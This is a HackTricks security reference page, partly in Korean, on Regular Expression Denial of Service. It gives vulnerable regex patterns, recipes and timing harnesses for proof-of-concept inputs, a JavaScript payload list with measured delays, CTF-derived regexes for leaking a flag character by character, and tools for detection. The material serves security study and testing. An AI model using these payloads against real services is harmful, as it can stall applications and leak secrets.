Regular expression Denial of Service - ReDoS

Reading time: 6 minutes

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

구독 계획 확인하기!
**💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

Regular Expression Denial of Service (ReDoS)

A Regular Expression Denial of Service (ReDoS) happens when someone takes advantage of weaknesses in how regular expressions (a way to search and match patterns in text) work. Sometimes, when regular expressions are used, they can become very slow, especially if the piece of text they're working with gets larger. This slowness can get so bad that it grows really fast with even small increases in the text size. Attackers can use this problem to make a program that uses regular expressions stop working properly for a long time.

The Problematic Regex Naïve Algorithm

Check the details in https://owasp.org/www-community/attacks/Regularexpression_Denial_of_Service-_ReDoS

Engine behavior and exploitability

Most popular engines (PCRE, Java java.util.regex, Python re, JavaScript RegExp) use a backtracking VM. Crafted inputs that create many overlapping ways to match a subpattern force exponential or high-polynomial backtracking.
Some engines/libraries are designed to be ReDoS-resilient by construction (no backtracking), e.g. RE2 and ports based on finite automata that provide worst‑case linear time; using them for untrusted input removes the backtracking DoS primitive. See the references at the end for details.

Evil Regexes

악성 regular expression 패턴은 특정 입력에서 DoS를 유발하도록 멈출 수 있는 패턴입니다. 악성 regex 패턴은 보통 중첩된 반복(grouping with repetition)이나 반복 내부의 겹침이 있는 alternation을 포함합니다. 몇 가지 예시는 다음과 같습니다:

(a+)+
([a-zA-Z]+)*
(a|aa)+
(a|a?)+
(.*a){x} for x > 10

All those are vulnerable to the input aaaaaaaaaaaaaaaaaaaaaaaa!.

Practical recipe to build PoCs

대부분의 치명적인 사례는 다음 형태를 따릅니다:

취약한 서브패턴으로 들어가게 하는 접두사(선택적).
중첩되거나 겹치는 수량자 내부에서 애매한 매치를 만드는 긴 문자 연속(예: 많은 a, _, 또는 공백).
전체 실패를 강제하는 마지막 문자 — 엔진이 모든 가능성을 백트랙해야 하게 만듭니다(종종 마지막 토큰과 매치되지 않는 문자, 예: !).

최소 예시:

(a+)+$ vs input "a"*N + "!"
\w*_*\w*$ vs input "v" + "_"*N + "!"

N을 늘리면 초선형(super-linear) 성장이 관찰됩니다.

Quick timing harness (Python)

python

import re, time
pat = re.compile(r'(\w*_)\w*$')
for n in [2**k for k in range(8, 15)]:
s = 'v' + '_'*n + '!'
t0=time.time(); pat.search(s); dt=time.time()-t0
print(n, f"{dt:.3f}s")

ReDoS Payloads

String Exfiltration via ReDoS

CTF(또는 bug bounty)에서는 민감한 정보(예: flag)와 매칭되는 Regex를 제어할 수 있는 경우가 있습니다.
그렇다면 Regex가 매칭될 때만 페이지가 멈추게 (timeout 또는 더 긴 처리 시간) 하고, 매칭되지 않을 때는 그렇지 않게 만드는 것이 유용할 수 있습니다.
이렇게 하면 문자열을 char by char 방식으로 exfiltrate할 수 있습니다:

이 this post에서 이 ReDoS 룰을 찾을 수 있습니다: ^(?=<flag>)((.*)*)*salt$
Example: ^(?=HTB{sOmE_fl§N§)((.*)*)*salt$
이 this writeup에서 다음을 찾을 수 있습니다: <flag>(((((((.*)*)*)*)*)*)*)!
이 this writeup에서는 다음을 사용했습니다: ^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$

ReDoS Controlling Input and Regex

다음은 ReDoS 예제로, input과 regex를 모두 control할 수 있는 경우들입니다:

javascript

function check_time_regexp(regexp, text) {
var t0 = new Date().getTime()
new RegExp(regexp).test(text)
var t1 = new Date().getTime()
console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
}

// This payloads work because the input has several "a"s
;[
//  "((a+)+)+$",  //Eternal,
//  "(a?){100}$", //Eternal
"(a|a?)+$",
"(\\w*)+$", //Generic
"(a*)+$",
"(.*a){100}$",
"([a-zA-Z]+)*$", //Generic
"(a+)*$",
].forEach((regexp) => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))

/*
Regexp (a|a?)+$ took 5076 milliseconds.
Regexp (\w*)+$ took 3198 milliseconds.
Regexp (a*)+$ took 3281 milliseconds.
Regexp (.*a){100}$ took 1436 milliseconds.
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
Regexp (a+)*$ took 723 milliseconds.
*/

공격자용 언어/엔진 노트

JavaScript (browser/Node): 내장 RegExp는 backtracking 엔진이며 regex+입력이 공격자에게 영향을 받으면 흔히 악용됩니다.
Python: re는 backtracking입니다. 긴 모호한 반복과 실패하는 꼬리가 결합되면 종종 치명적인 backtracking을 유발합니다.
Java: java.util.regex는 backtracking입니다. 입력만 제어할 수 있다면 복잡한 validator를 사용하는 엔드포인트를 찾아보세요; 패턴(예: 저장된 규칙)을 제어할 수 있다면 ReDoS는 보통 쉽습니다.
Engines such as RE2/RE2J/RE2JS or the Rust regex crate are designed to avoid catastrophic backtracking. 이런 엔진을 만나면 다른 병목(예: 매우 큰 패턴)에 집중하거나 여전히 backtracking 엔진을 사용하는 구성요소를 찾아보세요.

도구

https://github.com/doyensec/regexploit
취약한 regex를 찾아 악의적 입력을 자동 생성합니다. 예:
pip install regexploit
패턴 하나를 인터랙티브하게 분석: regexploit
Python/JS 코드에서 regex를 스캔: regexploit-py path/ 및 regexploit-js path/
https://devina.io/redos-checker
https://github.com/davisjam/vuln-regex-detector
프로젝트에서 regex를 추출하고 취약한 것을 탐지하며 대상 언어로 PoC를 검증하는 end-to-end 파이프라인입니다. 대규모 코드베이스를 수색할 때 유용합니다.
https://github.com/tjenkinson/redos-detector
패턴이 안전한지 보고하기 위해 backtracking을 분석하는 간단한 CLI/JS 라이브러리입니다.

Tip: 입력만 제어할 수 있을 때는 길이를 두 배로 늘려가며(예: 2^k 문자) 문자열을 생성하고 지연(latency)을 측정하세요. 지연이 지수적으로 증가하면 ReDoS가 가능함을 강하게 시사합니다.

참고자료

https://owasp.org/www-community/attacks/Regularexpression_Denial_of_Service-_ReDoS
https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets
https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html
https://ctftime.org/writeup/25869
SoK (2024): Regular Expression Denial of Service (ReDoS)에 대한 문헌 및 엔지니어링 리뷰 — https://arxiv.org/abs/2406.11618
Why RE2 (linear‑time regex engine) — https://github.com/google/re2/wiki/WhyRE2

tip

HackTricks 지원하기

구독 계획 확인하기!
**💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.